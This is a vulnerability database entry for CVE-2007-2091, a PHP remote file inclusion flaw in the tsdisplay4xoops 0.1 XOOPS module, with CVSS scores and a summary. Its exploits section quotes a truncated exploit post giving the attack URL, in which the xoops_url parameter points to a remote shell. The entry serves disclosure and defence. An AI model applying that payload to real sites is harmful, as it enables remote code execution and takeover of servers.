7.5
CVSSv2

CVE-2007-2091

Published: 18/04/2007 Updated: 11/10/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

PHP remote file inclusion vulnerability in blocks/tsdisplay4xoops_block2.php in tsdisplay4xoops (TSD4XOOPS, aka the TeamSpeak display module) 0.1 allows remote malicious users to execute arbitrary PHP code via a URL in the xoops_url parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

tsdisplay4xoops tsdisplay4xoops 0.1

Exploits

# tsdisplay4xoops 01(xoops_url)Remote File Include Vulnerabilitiy # DScript: kisskool30freefr/tsdisplay4xoopsv008zip # Discovered by: GolD_M = [Mahmood_ali] # Homepage: WwwTryagCom/cc # Exploit:[Path]/modules/tsdisplay4xoops/blocks/tsdisplay4xoops_block2php?xoops_url=Shell # Greetz To: TryagCom/cc & DwratCom & Asb- ...